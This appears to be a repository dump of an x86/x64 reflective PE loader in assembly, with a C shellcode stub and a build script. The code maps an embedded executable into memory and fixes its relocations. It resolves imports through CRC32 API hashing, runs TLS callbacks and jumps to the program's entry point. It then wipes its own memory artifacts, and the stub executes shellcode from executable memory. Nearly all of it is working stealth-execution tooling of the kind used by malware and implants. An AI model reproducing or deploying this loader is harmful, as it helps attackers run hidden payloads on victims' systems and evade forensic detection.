14 | loc_408eab: add eax,DWORD [ebx+0x3c]
15 | loc_408eae: mov edx,ebx
16 | loc_408eb0: add edx,DWORD [eax+0x78]
17 | loc_408eb3: mov eax,DWORD [eax+0x7c]
18 | loc_408eb6: mov DWORD [esp+0x1c],eax
19 | loc_408eba: mov edi,DWORD [edx+0x20]
20 | loc_408ebd: mov eax,DWORD [edx+0x1c]
21 | loc_408ec0: mov DWORD [esp+0x2c],eax
22 | loc_408ec4: mov eax,DWORD [edx+0x24]
23 | loc_408ec7: mov DWORD [esp+0x28],eax
24 | loc_408ecb: mov ecx,DWORD [edx+0x18]
25 | loc_408ece: test ecx,ecx
26 | loc_408ed0: je loc_409041
27 | loc_408ed6: mov esi,0x0
28 | loc_408edb: add edi,ebx
29 | loc_408edd: mov DWORD [esp+0x24],edx
30 | loc_408ee1: mov DWORD [esp+0x20],ecx
31 | loc_408ee5: mov DWORD [esp+0x4],0x0
32 | loc_408eed: mov eax,ebx
33 | loc_408eef: add eax,DWORD [edi+esi*4]
34 | loc_408ef2: mov DWORD [esp],eax
35 | loc_408ef5: call calc_crc
36 | loc_408efa: cmp DWORD [ebp+0x10],esi
37 | loc_408efd: je loc_408f19
38 | loc_408eff: cmp eax,DWORD [ebp+0xc]
39 | loc_408f02: je loc_408f19
40 | loc_408f04: add esi,0x1
41 | loc_408f07: mov eax,DWORD [esp+0x20]
42 | loc_408f0b: cmp esi,eax
43 | loc_408f0d: jne loc_408ee5
44 | loc_408f0f: mov eax,0x0
45 | loc_408f14: jmp loc_409023
46 | loc_408f19: mov edx,DWORD [esp+0x24]
47 | loc_408f1d: lea eax,[ebx+esi*2]
48 | loc_408f20: mov ecx,DWORD [esp+0x28]
49 | loc_408f24: movzx eax,WORD [eax+ecx*1]
50 | loc_408f28: lea eax,[ebx+eax*4]
51 | loc_408f2b: mov ecx,DWORD [esp+0x2c]
52 | loc_408f2f: add ebx,DWORD [eax+ecx*1]
53 | loc_408f32: cmp ebx,edx
54 | loc_408f34: jb loc_409021
55 | loc_408f3a: mov eax,DWORD [esp+0x1c]
56 | loc_408f3e: add edx,eax
57 | loc_408f40: cmp ebx,edx
58 | loc_408f42: jae loc_409021
59 | loc_408f48: vpxor xmm0,xmm0,xmm0
60 | loc_408f4c: vmovdqu [esp+0x38],xmm0
61 | loc_408f52: lea edi,[esp+0x48]
62 | loc_408f56: mov eax,0x0
63 | loc_408f5b: mov ecx,0x3d
64 | loc_408f60: rep stosd
65 | loc_408f62: vmovdqu [esp+0x13c],xmm0
66 | loc_408f6b: lea edi,[esp+0x14c]
67 | loc_408f72: mov ecx,0x3d
68 | loc_408f77: rep stosd
69 | loc_408f79: cmp BYTE [ebx],0x2e
70 | loc_408f7c: je loc_40902b
71 | loc_408f82: mov esi,0x0
72 | loc_408f87: add esi,0x1
73 | loc_408f8a: mov eax,esi
74 | loc_408f8c: cmp BYTE [ebx+esi*1],0x2e
75 | loc_408f90: jne loc_408f87
76 | loc_408f92: lea edx,[esp+0x38]
77 | loc_408f96: mov DWORD [esp+0x8],eax
78 | loc_408f9a: mov DWORD [esp+0x4],ebx
79 | loc_408f9e: mov DWORD [esp],edx
80 | loc_408fa1: call memcpy
81 | loc_408fa6: lea ecx,[ebx+esi*1+0x1]
82 | loc_408faa: cmp BYTE [ecx],0x0
83 | loc_408fad: je loc_40903a
84 | loc_408fb3: mov eax,0x0
85 | loc_408fb8: add esi,ebx
86 | loc_408fba: add eax,0x1
87 | loc_408fbd: mov edx,eax
88 | loc_408fbf: cmp BYTE [esi+eax*1+0x1],0x0
89 | loc_408fc4: jne loc_408fba
90 | loc_408fc6: lea eax,[esp+0x13c]
91 | loc_408fcd: mov DWORD [esp+0x8],edx
92 | loc_408fd1: mov DWORD [esp+0x4],ecx
93 | loc_408fd5: mov DWORD [esp],eax
94 | loc_408fd8: call memcpy
95 | loc_408fdd: lea eax,[esp+0x38]
96 | loc_408fe1: mov DWORD [esp],eax
97 | loc_408fe4: call load_module
98 | loc_408fe9: mov ebx,eax
99 | loc_408feb: mov eax,0x0
100 | loc_408ff0: test ebx,ebx
101 | loc_408ff2: je loc_409023
102 | loc_408ff4: mov DWORD [esp+0x4],0x0
103 | loc_408ffc: lea eax,[esp+0x13c]
104 | loc_409003: mov DWORD [esp],eax
105 | loc_409006: call calc_crc
106 | loc_40900b: mov DWORD [esp+0x8],0xffffffff
107 | loc_409013: mov DWORD [esp+0x4],eax
108 | loc_409017: mov DWORD [esp],ebx
109 | loc_40901a: call get_proc_by_crc
110 | loc_40901f: mov ebx,eax
111 | loc_409021: mov eax,ebx
112 | loc_409023: lea esp,[ebp-0xc]
113 | loc_409026: pop ebx
114 | loc_409027: pop esi
115 | loc_409028: pop edi
116 | loc_409029: pop ebp
117 | loc_40902a: ret
118 | loc_40902b: mov esi,0x0
119 | loc_409030: mov eax,0x0
120 | loc_409035: jmp loc_408f92
121 | loc_40903a: mov edx,0x0
122 | loc_40903f: jmp loc_408fc6
123 | loc_409041: mov eax,0x0
124 | loc_409046: jmp loc_409023
125 |
--------------------------------------------------------------------------------
/loader/loader-x86/inc/load_module.asm:
--------------------------------------------------------------------------------
1 | [BITS 32]
2 |
3 |
4 | load_module:
5 | loc_40a08a: push edi
6 | loc_40a08b: push ebx
7 | loc_40a08c: sub esp,0x234
8 | loc_40a092: mov ebx,DWORD [esp+0x240]
9 | loc_40a099: mov DWORD [esp+0x22c],0x0
10 | loc_40a0a4: lea edi,[esp+0x1c]
11 | loc_40a0a8: mov ecx,0x82
12 | loc_40a0ad: mov eax,0x0
13 | loc_40a0b2: rep stosd
14 | loc_40a0b4: cmp BYTE [ebx],0x0
15 | loc_40a0b7: je loc_40a14c
16 | loc_40a0bd: mov edx,0x0
17 | loc_40a0c2: mov eax,edx
18 | loc_40a0c4: add edx,0x1
19 | loc_40a0c7: cmp BYTE [ebx+edx*1],0x0
20 | loc_40a0cb: jne loc_40a0c2
21 | loc_40a0cd: add edx,edx
22 | loc_40a0cf: mov WORD [esp+0x224],dx
23 | loc_40a0d7: add edx,0x2
24 | loc_40a0da: mov WORD [esp+0x226],dx
25 | loc_40a0e2: lea edx,[esp+0x1c]
26 | loc_40a0e6: mov DWORD [esp+0x228],edx
27 | loc_40a0ed: test eax,eax
28 | loc_40a0ef: js loc_40a103
29 | loc_40a0f1: movsx dx,BYTE [ebx+eax*1]
30 | loc_40a0f6: mov WORD [esp+eax*2+0x1c],dx
31 | loc_40a0fb: sub eax,0x1
32 | loc_40a0fe: cmp eax,0xffffffff
33 | loc_40a101: jne loc_40a0f1
34 | loc_40a103: lea eax,[esp+0x22c]
35 | loc_40a10a: mov DWORD [esp+0xc],eax
36 | loc_40a10e: lea eax,[esp+0x224]
37 | loc_40a115: mov DWORD [esp+0x8],eax
38 | loc_40a119: mov DWORD [esp+0x4],0x0
39 | loc_40a121: mov DWORD [esp],0x0
40 | loc_111111: push 0xB4EBB9A4
41 | loc_222222: call api_call
42 | loc_xxxxxx: add esp,4
43 | loc_40a128: call eax
44 | loc_40a12e: sub esp,0x10
45 | loc_40a131: test eax,eax
46 | loc_40a133: js loc_40a145
47 | loc_40a135: mov eax,DWORD [esp+0x22c]
48 | loc_40a13c: add esp,0x234
49 | loc_40a142: pop ebx
50 | loc_40a143: pop edi
51 | loc_40a144: ret
52 | loc_40a145: mov eax,0x0
53 | loc_40a14a: jmp loc_40a13c
54 | loc_40a14c: mov WORD [esp+0x224],0x0
55 | loc_40a156: mov WORD [esp+0x226],0x2
56 | loc_40a160: lea eax,[esp+0x1c]
57 | loc_40a164: mov DWORD [esp+0x228],eax
58 | loc_40a16b: jmp loc_40a103
59 |
--------------------------------------------------------------------------------
/loader/loader-x86/inc/map_image.asm:
--------------------------------------------------------------------------------
1 | [BITS 32]
2 |
3 |
4 | map_image:
5 | loc_401f00: push ebp
6 | loc_401f01: push edi
7 | loc_401f02: push esi
8 | loc_401f03: push ebx
9 | loc_401f04: sub esp,0x3c
10 | loc_401f07: mov ebp,DWORD [esp+0x50]
11 | loc_401f0b: mov edi,ebp
12 | loc_401f0d: add edi,DWORD [ebp+0x3c]
13 | loc_401f10: mov eax,0x0
14 | loc_401f15: cmp DWORD [edi],0x4550
15 | loc_401f1b: jne loc_401fcf
16 | loc_401f21: mov DWORD [esp+0x2c],0x0
17 | loc_401f29: mov eax,DWORD [edi+0x50]
18 | loc_401f2c: mov DWORD [esp+0x28],eax
19 | loc_401f30: mov DWORD [esp+0x14],0x4
20 | loc_401f38: mov DWORD [esp+0x10],0x103000
21 | loc_401f40: lea eax,[esp+0x28]
22 | loc_401f44: mov DWORD [esp+0xc],eax
23 | loc_401f48: mov DWORD [esp+0x8],0x0
24 | loc_401f50: lea eax,[esp+0x2c]
25 | loc_401f54: mov DWORD [esp+0x4],eax
26 | loc_401f58: mov DWORD [esp],0xffffffff
27 | loc_333333: push 0x99CE7C55
28 | loc_444444: call api_call
29 | loc_yyyyyy: add esp,4
30 | loc_401f5f: call eax
31 | loc_401f65: sub esp,0x18
32 | loc_401f68: mov edx,eax
33 | loc_401f6a: mov eax,0x0
34 | loc_401f6f: test edx,edx
35 | loc_401f71: js loc_401fcf
36 | loc_401f73: mov eax,DWORD [edi+0x54]
37 | loc_401f76: mov DWORD [esp+0x8],eax
38 | loc_401f7a: mov DWORD [esp+0x4],ebp
39 | loc_401f7e: mov eax,DWORD [esp+0x2c]
40 | loc_401f82: mov DWORD [esp],eax
41 | loc_401f85: call memcpy
42 | loc_401f8a: movzx eax,WORD [edi+0x14]
43 | loc_401f8e: lea ebx,[edi+eax*1+0x18]
44 | loc_401f92: cmp WORD [edi+0x6],0x0
45 | loc_401f97: je loc_401fcb
46 | loc_401f99: mov esi,0x0
47 | loc_401f9e: mov eax,DWORD [ebx+0xc]
48 | loc_401fa1: add eax,DWORD [esp+0x2c]
49 | loc_401fa5: mov edx,ebp
50 | loc_401fa7: add edx,DWORD [ebx+0x14]
51 | loc_401faa: mov ecx,DWORD [ebx+0x10]
52 | loc_401fad: mov DWORD [esp+0x8],ecx
53 | loc_401fb1: mov DWORD [esp+0x4],edx
54 | loc_401fb5: mov DWORD [esp],eax
55 | loc_401fb8: call memcpy
56 | loc_401fbd: add esi,0x1
57 | loc_401fc0: add ebx,0x28
58 | loc_401fc3: movzx eax,WORD [edi+0x6]
59 | loc_401fc7: cmp eax,esi
60 | loc_401fc9: jg loc_401f9e
61 | loc_401fcb: mov eax,DWORD [esp+0x2c]
62 | loc_401fcf: add esp,0x3c
63 | loc_401fd2: pop ebx
64 | loc_401fd3: pop esi
65 | loc_401fd4: pop edi
66 | loc_401fd5: pop ebp
67 | loc_401fd6: ret
68 |
--------------------------------------------------------------------------------
/loader/loader-x86/inc/memcpy.asm:
--------------------------------------------------------------------------------
1 | [BITS 32]
2 |
3 | ; memcpy(&dst, &src, size)
4 | memcpy:
5 | push ebp
6 | mov ebp, esp
7 | push esi
8 | push edi
9 | push ecx
10 | mov edi,[ebp+8]
11 | mov esi,[ebp+12]
12 | mov ecx,[ebp+16]
13 | copy_byte:
14 | rep movsb ; Copy the CX number of bytes from RSI to RDI
15 | pop ecx
16 | pop edi
17 | pop esi
18 | mov esp,ebp
19 | pop ebp
20 | ret ; Return
--------------------------------------------------------------------------------
/loader/loader-x86/inc/protect_sections.asm:
--------------------------------------------------------------------------------
1 | [BITS 32]
2 |
3 | protect_sections:
4 | loc_4057e8: push ebp
5 | loc_4057e9: push edi
6 | loc_4057ea: push esi
7 | loc_4057eb: push ebx
8 | loc_4057ec: sub esp,0x4c
9 | loc_4057ef: mov ebp,DWORD [esp+0x60]
10 | loc_4057f3: mov edi,ebp
11 | loc_4057f5: add edi,DWORD [ebp+0x3c]
12 | loc_4057f8: movzx eax,WORD [edi+0x14]
13 | loc_4057fc: lea ebx,[edi+eax*1+0x18]
14 | loc_405800: mov DWORD [esp+0x3c],0x0
15 | loc_405808: cmp WORD [edi+0x6],0x0
16 | loc_40580d: je loc_405840
17 | loc_40580f: mov esi,0x0
18 | loc_405814: mov ebp,edi
19 | loc_405816: jmp loc_40591e
20 | loc_40581b: mov BYTE [esp+0x2f],0x1
21 | loc_405820: jmp loc_405863
22 | loc_405822: mov edx,0x20
23 | loc_405827: jmp loc_4058ba
24 | loc_40582c: mov eax,0x0
25 | loc_405831: jmp loc_405838
26 | loc_405833: mov eax,0x1
27 | loc_405838: add esp,0x4c
28 | loc_40583b: pop ebx
29 | loc_40583c: pop esi
30 | loc_40583d: pop edi
31 | loc_40583e: pop ebp
32 | loc_40583f: ret
33 | loc_405840: mov eax,0x1
34 | loc_405845: jmp loc_405838
35 | loc_405847: mov edi,eax
36 | loc_405849: shr edi,0x1f
37 | loc_40584c: mov BYTE [esp+0x2f],0x0
38 | loc_405851: test eax,0x20000000
39 | loc_405856: je loc_405892
40 | loc_405858: mov edx,0x10
41 | loc_40585d: mov ecx,edi
42 | loc_40585f: test cl,cl
43 | loc_405861: je loc_405897
44 | loc_405863: and eax,0x60000000
45 | loc_405868: mov edi,0x1
46 | loc_40586d: cmp eax,0x60000000
47 | loc_405872: mov edx,0x20
48 | loc_405877: mov eax,0x80
49 | loc_40587c: cmovne edx,eax
50 | loc_40587f: jmp loc_4058a7
51 | loc_405881: test eax,0x20000000
52 | loc_405886: jne loc_40581b
53 | loc_405888: mov BYTE [esp+0x2f],0x1
54 | loc_40588d: mov edx,0x4
55 | loc_405892: mov edi,0x0
56 | loc_405897: and eax,0x60000000
57 | loc_40589c: cmp eax,0x60000000
58 | loc_4058a1: je loc_405822
59 | loc_4058a7: cmp BYTE [esp+0x2f],0x0
60 | loc_4058ac: je loc_4058ba
61 | loc_4058ae: mov eax,edi
62 | loc_4058b0: test al,al
63 | loc_4058b2: mov eax,0x40
64 | loc_4058b7: cmovne edx,eax
65 | loc_4058ba: mov eax,DWORD [esp+0x60]
66 | loc_4058be: mov ecx,DWORD [esp+0x28]
67 | loc_4058c2: add eax,DWORD [ecx+0xc]
68 | loc_4058c5: mov DWORD [esp+0x3c],eax
69 | loc_4058c9: mov eax,DWORD [ecx+0x10]
70 | loc_4058cc: mov DWORD [esp+0x34],eax
71 | loc_4058d0: mov DWORD [esp+0x38],0x0
72 | loc_4058d8: lea eax,[esp+0x38]
73 | loc_4058dc: mov DWORD [esp+0x10],eax
74 | loc_4058e0: mov DWORD [esp+0xc],edx
75 | loc_4058e4: lea eax,[esp+0x34]
76 | loc_4058e8: mov DWORD [esp+0x8],eax
77 | loc_4058ec: lea eax,[esp+0x3c]
78 | loc_4058f0: mov DWORD [esp+0x4],eax
79 | loc_4058f4: mov DWORD [esp],0xffffffff
80 | loc_555555: push 0x6EDE4D41
81 | loc_666666: call api_call
82 | loc_zzzzzz: add esp,4
83 | loc_4058fb: call eax
84 | loc_405901: sub esp,0x14
85 | loc_405904: test eax,eax
86 | loc_405906: js loc_40582c
87 | loc_40590c: add esi,0x1
88 | loc_40590f: add ebx,0x28
89 | loc_405912: movzx eax,WORD [ebp+0x6]
90 | loc_405916: cmp eax,esi
91 | loc_405918: jle loc_405833
92 | loc_40591e: mov DWORD [esp+0x28],ebx
93 | loc_405922: mov eax,DWORD [ebx+0x24]
94 | loc_405925: test eax,eax
95 | loc_405927: je loc_40590c
96 | loc_405929: cdq
97 | loc_40592a: and edx,0xffffffc8
98 | loc_40592d: add edx,0x40
99 | loc_405930: test eax,0x40000000
100 | loc_405935: je loc_405847
101 | loc_40593b: test eax,eax
102 | loc_40593d: js loc_405881
103 | loc_405943: mov edi,0x0
104 | loc_405948: mov BYTE [esp+0x2f],0x1
105 | loc_40594d: mov edx,0x2
106 | loc_405952: jmp loc_405851
107 |
--------------------------------------------------------------------------------
/loader/loader-x86/inc/relocate_image.asm:
--------------------------------------------------------------------------------
1 | [BITS 32]
2 |
3 |
4 | relocate_image:
5 | loc_403055: push ebp
6 | loc_403056: push edi
7 | loc_403057: push esi
8 | loc_403058: push ebx
9 | loc_403059: mov ebp,DWORD [esp+0x14]
10 | loc_40305d: mov ebx,ebp
11 | loc_40305f: add ebx,DWORD [ebp+0x3c]
12 | loc_403062: mov edx,DWORD [ebx+0xa0]
13 | loc_403068: mov eax,0x0
14 | loc_40306d: test edx,edx
15 | loc_40306f: je loc_4030d3
16 | loc_403071: add edx,ebp
17 | loc_403073: mov esi,ebp
18 | loc_403075: sub esi,DWORD [ebx+0x34]
19 | loc_403078: cmp DWORD [edx],0x0
20 | loc_40307b: jne loc_4030be
21 | loc_40307d: mov eax,0x1
22 | loc_403082: jmp loc_4030d3
23 | loc_403084: movzx ecx,WORD [eax]
24 | loc_403087: and ecx,0xfff
25 | loc_40308d: add ecx,DWORD [edx]
26 | loc_40308f: add DWORD [ebp+ecx*1+0x0],esi
27 | loc_403093: add eax,0x2
28 | loc_403096: mov ecx,edx
29 | loc_403098: add ecx,DWORD [edx+0x4]
30 | loc_40309b: cmp eax,ecx
31 | loc_40309d: je loc_4030b7
32 | loc_40309f: movzx ecx,BYTE [eax+0x1]
33 | loc_4030a3: mov edi,ecx
34 | loc_4030a5: and edi,0xfffffff0
35 | loc_4030a8: mov ebx,edi
36 | loc_4030aa: cmp bl,0x30
37 | loc_4030ad: je loc_403084
38 | loc_4030af: cmp cl,0xf
39 | loc_4030b2: jbe loc_403093
40 | loc_4030b4: int3
41 | loc_4030b5: jmp loc_403093
42 | loc_4030b7: mov edx,eax
43 | loc_4030b9: cmp DWORD [edx],0x0
44 | loc_4030bc: je loc_4030ce
45 | loc_4030be: lea eax,[edx+0x8]
46 | loc_4030c1: mov ecx,edx
47 | loc_4030c3: add ecx,DWORD [edx+0x4]
48 | loc_4030c6: cmp eax,ecx
49 | loc_4030c8: jne loc_40309f
50 | loc_4030ca: mov edx,ecx
51 | loc_4030cc: jmp loc_4030b9
52 | loc_4030ce: mov eax,0x1
53 | loc_4030d3: pop ebx
54 | loc_4030d4: pop esi
55 | loc_4030d5: pop edi
56 | loc_4030d6: pop ebp
57 | loc_4030d7: ret
58 |
--------------------------------------------------------------------------------
/loader/loader-x86/inc/resolve_imports.asm:
--------------------------------------------------------------------------------
1 | [BITS 32]
2 |
3 |
4 | resolve_imports:
5 | loc_4042ff: push ebp
6 | loc_404300: push edi
7 | loc_404301: push esi
8 | loc_404302: push ebx
9 | loc_404303: sub esp,0x2c
10 | loc_404306: mov ebp,DWORD [esp+0x40]
11 | loc_40430a: mov eax,DWORD [ebp+0x3c]
12 | loc_40430d: mov edx,DWORD [ebp+eax*1+0x80]
13 | loc_404314: mov eax,0x0
14 | loc_404319: test edx,edx
15 | loc_40431b: je loc_4043d5
16 | loc_404321: lea eax,[ebp+edx*1+0x0]
17 | loc_404325: mov DWORD [esp+0x1c],eax
18 | loc_404329: mov eax,DWORD [eax+0xc]
19 | loc_40432c: test eax,eax
20 | loc_40432e: jne loc_4043a4
21 | loc_404330: mov eax,0x1
22 | loc_404335: jmp loc_4043d5
23 | loc_40433a: mov DWORD [esp+0x8],eax
24 | loc_40433e: mov DWORD [esp+0x4],0x0
25 | loc_404346: mov DWORD [esp],edi
26 | loc_404349: call get_proc_by_crc
27 | loc_40434e: test eax,eax
28 | loc_404350: je loc_404354
29 | loc_404352: mov DWORD [esi],eax
30 | loc_404354: add ebx,0x4
31 | loc_404357: add esi,0x4
32 | loc_40435a: mov eax,DWORD [ebx]
33 | loc_40435c: test eax,eax
34 | loc_40435e: je loc_404394
35 | loc_404360: test eax,eax
36 | loc_404362: js loc_40433a
37 | loc_404364: mov DWORD [esp+0x4],0x0
38 | loc_40436c: lea eax,[ebp+eax*1+0x2]
39 | loc_404370: mov DWORD [esp],eax
40 | loc_404373: call calc_crc
41 | loc_404378: mov DWORD [esp+0x8],0xffffffff
42 | loc_404380: mov DWORD [esp+0x4],eax
43 | loc_404384: mov DWORD [esp],edi
44 | loc_404387: call get_proc_by_crc
45 | loc_40438c: test eax,eax
46 | loc_40438e: je loc_404354
47 | loc_404390: mov DWORD [esi],eax
48 | loc_404392: jmp loc_404354
49 | loc_404394: add DWORD [esp+0x1c],0x14
50 | loc_404399: mov eax,DWORD [esp+0x1c]
51 | loc_40439d: mov eax,DWORD [eax+0xc]
52 | loc_4043a0: test eax,eax
53 | loc_4043a2: je loc_4043c9
54 | loc_4043a4: add eax,ebp
55 | loc_4043a6: mov DWORD [esp],eax
56 | loc_4043a9: call load_module
57 | loc_4043ae: mov edi,eax
58 | loc_4043b0: test eax,eax
59 | loc_4043b2: je loc_4043d0
60 | loc_4043b4: mov eax,DWORD [esp+0x1c]
61 | loc_4043b8: mov ebx,ebp
62 | loc_4043ba: add ebx,DWORD [eax]
63 | loc_4043bc: mov esi,ebp
64 | loc_4043be: add esi,DWORD [eax+0x10]
65 | loc_4043c1: mov eax,DWORD [ebx]
66 | loc_4043c3: test eax,eax
67 | loc_4043c5: jne loc_404360
68 | loc_4043c7: jmp loc_404394
69 | loc_4043c9: mov eax,0x1
70 | loc_4043ce: jmp loc_4043d5
71 | loc_4043d0: mov eax,0x0
72 | loc_4043d5: add esp,0x2c
73 | loc_4043d8: pop ebx
74 | loc_4043d9: pop esi
75 | loc_4043da: pop edi
76 | loc_4043db: pop ebp
77 | loc_4043dc: ret
78 |
--------------------------------------------------------------------------------
/loader/loader-x86/inc/run_tls_callbacks.asm:
--------------------------------------------------------------------------------
1 | [BITS 32]
2 |
3 |
4 | run_tls_callbacks:
5 | loc_406cdf: push esi
6 | loc_406ce0: push ebx
7 | loc_406ce1: sub esp,0x14
8 | loc_406ce4: mov esi,DWORD [esp+0x20]
9 | loc_406ce8: mov eax,DWORD [esi+0x3c]
10 | loc_406ceb: mov edx,DWORD [esi+eax*1+0xc0]
11 | loc_406cf2: mov eax,0x0
12 | loc_406cf7: test edx,edx
13 | loc_406cf9: je loc_406d08
14 | loc_406cfb: mov ebx,DWORD [esi+edx*1+0xc]
15 | loc_406cff: mov eax,0x1
16 | loc_406d04: test ebx,ebx
17 | loc_406d06: jne loc_406d29
18 | loc_406d08: add esp,0x14
19 | loc_406d0b: pop ebx
20 | loc_406d0c: pop esi
21 | loc_406d0d: ret
22 | loc_406d0e: mov DWORD [esp+0x8],0x0
23 | loc_406d16: mov DWORD [esp+0x4],0x1
24 | loc_406d1e: mov DWORD [esp],esi
25 | loc_406d21: call eax
26 | loc_406d23: sub esp,0xc
27 | loc_406d26: add ebx,0x4
28 | loc_406d29: mov eax,DWORD [ebx]
29 | loc_406d2b: test eax,eax
30 | loc_406d2d: jne loc_406d0e
31 | loc_406d2f: mov eax,0x1
32 | loc_406d34: jmp loc_406d08
33 |
--------------------------------------------------------------------------------
/loader/loader-x86/loader-x86-lite.asm:
--------------------------------------------------------------------------------
1 | ;#===========================================#
2 | ;# x86 Reflective Loader #
3 | ;# Author: Ege Balcı #
4 | ;# Version: 3.0 #
5 | ;#===========================================#
6 |
7 | [BITS 32]
8 |
9 | %define e_lfanew 0x3C
10 | %define _AddressOfEntry 0x28
11 | loader_size equ pe_start-loader
12 |
13 |
14 | call loader ; Start by calling over the PE image
15 | loader:
16 | pop esi ; Get current address into esi
17 | add esi, loader_size ; Add the loader size
18 | push ebp ; Save EBP
19 | mov ebp,esp ; Create a stack frame
20 | push esi ; Push the PE address as first parameter
21 | call map_image ; Perform PE image mapping
22 | pop esi ; Pop out the PE address
23 | push eax ; Push new image baes to stack
24 | call relocate_image ; Perform image relocation
25 | call resolve_imports ; Resolve image imports & create IAT table
26 | call protect_sections ; Apply proper section memory protections
27 | call run_tls_callbacks ; Try to execute TLS callbacks. May fail... ¯\_(ツ)_/¯
28 | pop edi ; Get the new image base value into edi
29 | mov eax,[edi+e_lfanew] ; Get the file header offset
30 | mov eax,[edi+eax+_AddressOfEntry] ; Get the AddressOfEntry into eax
31 | add eax,edi ; Add the AOE onto new image base
32 | cld ; Clear direction flags
33 | mov esp, ebp ; Restore stack frame
34 | pop ebp ; Restore RBP
35 | jmp eax ; Jmp to the PE->AOE
36 | ; ------------------------ FUNCTIONS ------------------------------------
37 | %include "./inc/memcpy.asm"
38 | %include "./inc/calc_crc.asm"
39 | %include "./inc/map_image.asm"
40 | %include "./inc/load_module.asm"
41 | %include "./inc/relocate_image.asm"
42 | %include "./inc/resolve_imports.asm"
43 | %include "./inc/get_proc_by_crc.asm"
44 | %include "./inc/get_module_by_crc.asm"
45 | %include "./inc/protect_sections.asm"
46 | %include "./inc/run_tls_callbacks.asm"
47 | %include "../crc32_api/crc32_api_x86.asm"
48 | ;------------------------ FUNCTIONS -------------------------------------
49 | pe_start:
--------------------------------------------------------------------------------
/loader/loader-x86/loader-x86.asm:
--------------------------------------------------------------------------------
1 | ;#===========================================#
2 | ;# x86 Reflective Loader #
3 | ;# Author: Ege Balcı #
4 | ;# Version: 3.0 #
5 | ;#===========================================#
6 |
7 | [BITS 32]
8 |
9 | %define e_lfanew 0x3C
10 | %define _AddressOfEntry 0x28
11 |
12 | call start ; Start by calling over the PE image
13 | incbin "putty.exe" ; PE image
14 | start:
15 | pop esi ; Get the PE address into esi
16 | push ebp ; Save EBP
17 | mov ebp,esp ; Create a stack frame
18 | push esi ; Push the PE address as first parameter
19 | call map_image ; Perform PE image mapping
20 | pop esi ; Pop out the PE address
21 | push eax ; Push new image baes to stack
22 | call relocate_image ; Perform image relocation
23 | call resolve_imports ; Resolve image imports & create IAT table
24 | call protect_sections ; Apply proper section memory protections
25 | call run_tls_callbacks ; Try to execute TLS callbacks. May fail... ¯\_(ツ)_/¯
26 | pop edi ; Get the new image base value into edi
27 | mov eax,[edi+e_lfanew] ; Get the file header offset
28 | mov eax,[edi+eax+_AddressOfEntry] ; Get the AddressOfEntry into eax
29 | add eax,edi ; Add the AOE onto new image base
30 | jmp wipe ; Wipe memory artifacts
31 | ; ------------------------ FUNCTIONS ------------------------------------
32 | %include "./inc/memcpy.asm"
33 | %include "./inc/calc_crc.asm"
34 | %include "./inc/map_image.asm"
35 | %include "./inc/load_module.asm"
36 | %include "./inc/relocate_image.asm"
37 | %include "./inc/resolve_imports.asm"
38 | %include "./inc/get_proc_by_crc.asm"
39 | %include "./inc/get_module_by_crc.asm"
40 | %include "./inc/protect_sections.asm"
41 | %include "./inc/run_tls_callbacks.asm"
42 | %include "../crc32_api/crc32_api_x86.asm"
43 | ;------------------------ FUNCTIONS -------------------------------------
44 | wipe:
45 | wipe_len_delta equ wipe_end-wipe
46 | call $+5 ; Get current EIP to stack
47 | pop ecx ; Pop currect EIP to RCX
48 | sub ecx,esi ; Calculate the size of the PE file
49 | add ecx,wipe_len_delta ; Add the size of wipe code
50 | mov edi,esi ; Move the PE address to RDI
51 | sub edi,0x5 ; Go back 5 bytes for wiping the initial call as well
52 | wipe_end:
53 | rep stosb ; Store AL into RDI and decrement RDI until RCX = 0
54 | ; -------------------- SWITCH TO PE ----------------------------
55 | cld ; Clear direction flags
56 | mov esp, ebp ; Restore stack frame
57 | pop ebp ; Restore RBP
58 | jmp eax ; Jmp to the PE->AOE
--------------------------------------------------------------------------------
/loader/loader-x86/stub.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include "shellcode.h"
3 |
4 | int main(int argc, char const *argv[])
5 | {
6 | char* BUFFER = (char*)VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
7 | memcpy(BUFFER, shellcode, sizeof(shellcode));
8 | (*(void(*)())BUFFER)();
9 | return 0;
10 | }
11 |
--------------------------------------------------------------------------------
/loader/syscall-loader-x64/build.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | ## ANSI Colors (FG & BG)
3 | RED="$(printf '\033[31m')" GREEN="$(printf '\033[32m')" YELLOW="$(printf '\033[33m')" BLUE="$(printf '\033[34m')"
4 | MAGENTA="$(printf '\033[35m')" CYAN="$(printf '\033[36m')" WHITE="$(printf '\033[37m')" BLACK="$(printf '\033[30m')"
5 | REDBG="$(printf '\033[41m')" GREENBG="$(printf '\033[42m')" YELLOWBG="$(printf '\033[43m')" BLUEBG="$(printf '\033[44m')"
6 | MAGENTABG="$(printf '\033[45m')" CYANBG="$(printf '\033[46m')" WHITEBG="$(printf '\033[47m')" BLACKBG="$(printf '\033[40m')"
7 | RESET="$(printf '\e[0m')"
8 |
9 | print_warning() {
10 | echo ${YELLOW}"[!] ${RESET}${1}"
11 | }
12 | print_error() {
13 | echo "${RED}[-] ${RESET}${1}"
14 | }
15 | print_fatal() {
16 | echo -e ${RED}"[!] $1\n${RESET}"
17 | kill -10 $$
18 | }
19 | print_good() {
20 | echo "${GREEN}[+] ${RESET}${1}"
21 | }
22 | print_status() {
23 | echo "${YELLOW}[*] ${RESET}${1}"
24 | }
25 |
26 | nasm -f bin syscall-loader-x64.asm -o shellcode || print_fatal "nasm failed!"
27 | print_status "Payload Size: `wc -c shellcode|cut -d' ' -f1`"
28 | [[ -f shellcode ]] && xxd -i shellcode shellcode.h
29 |
30 | x86_64-w64-mingw32-gcc stub.c -o test.exe || print_fatal "Compilation failed!"
31 | cp test.exe /tmp/
32 | rm shellcode shellcode.h
33 | print_good "Build done!"
34 |
--------------------------------------------------------------------------------
/loader/syscall-loader-x64/inc/calc_crc.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 |
3 |
4 | calc_crc:
5 | test dx,dx
6 | je loc_1400039c9
7 | mov r8,rcx
8 | movzx edx,dx
9 | lea eax,[rdx-0x1]
10 | lea rdx,[rcx+rax*1+0x1]
11 | mov eax,0x0
12 | loc_1400039b8:
13 | crc32 eax,BYTE [r8]
14 | add r8,0x1
15 | cmp r8,rdx
16 | jne loc_1400039b8
17 | jmp loc_1400039ea
18 | loc_1400039c9:
19 | movzx edx,BYTE [rcx]
20 | test dl,dl
21 | je loc_1400039eb
22 | add rcx,0x1
23 | mov eax,0x0
